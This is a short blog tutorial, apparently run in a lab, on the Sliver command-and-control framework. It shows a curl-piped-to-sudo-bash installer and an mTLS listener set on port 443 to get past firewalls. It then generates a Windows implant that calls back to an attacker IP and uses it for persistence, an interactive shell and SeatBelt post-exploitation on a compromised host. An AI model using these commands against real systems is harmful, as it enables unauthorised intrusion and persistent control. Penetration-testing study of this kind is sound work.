Open in app

Sign in

Write

Sign in

Sliver C2 Basic Usage

JP-Sec
3 min readApr 26, 2024

--

Introduction

Sliver is a command and control (C2) open source and cross-platform framework released in 2020 by BishopFox. Developed to provide a robust alternative to traditional penetration testing tools, Sliver C2 offers a unique suite of capabilities that supports dynamic interaction with compromised systems. It is built to evade detection and includes features such as multi-platform support, encrypted communications, and the ability to generate modular implants

Download

In this post, I will use Kali Linux, but you can totally follow along if you use another Linux distro

From their GitHub repository, they provide a one-liner to install Sliver

$ curl https://sliver.sh/install | sudo bash

Confirm the installation was successful by running the command

$ sliver

If you have problems starting Sliver, you can restart it by running the command

$ sudo systemctl restart sliver

Then, try running Sliver again

Usage

Today, we will cover only the basic usage of Sliver. If you want more details or advanced features, you can check their documentation here

Setting up the listener

Here, 10.10.14.16 is my attacker IP

I created a listener on port 443. I recommend using common ports because there’s a better chance that the connection will be allowed by the firewall

sliver > mtls --lport 443

You can verify that your listener is running

sliver > jobs

Generating the Implant and using it

My target IP is 10.129.165.176

In my scenario, I have a reverse shell on my target by exploiting a service, but I will use Sliver to add persistence

First I generate the Implant, this will be an .exe file

sliver > generate --mtls 10.10.14.16:443 --os Windows --arch 64

Here you can see the Implant is generated on my Desktop folder as SIGNIFICANT_SUSPENDERS.EXE

I import into the target SIGNIFICANT_SUSPENDERS.EXE and run it

I get a connection back to sliver, by running sessions I can see the information and the ID

sliver > sessions

To interact with the implant use:

sliver > use <ID>

You can get more information about the commands you can use by running the help command

For example the command shell will give you an interactive shell

sliver (SIGNIFICANT_SUSPENDERS) > shell

You can run post exploitation tools such as Rubeus / SeatBelt and many others. You can see more at https://sliver.sh/docs?name=Armory

I will demonstrate for SeatBelt

sliver (SIGNIFICANT_SUSPENDERS) > armory install seatbelt

You can now use SeatBelt

sliver (SIGNIFICANT_SUSPENDERS) > seatbelt -group=all
Hacking
Red Team
Penetration Testing
Active Directory
Cybersecurity

--

--

JP-Sec

Written by JP-Sec

33 Followers

Connect with me on LinkedIn: https://www.linkedin.com/in/josspoupeney-b8517b174/

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams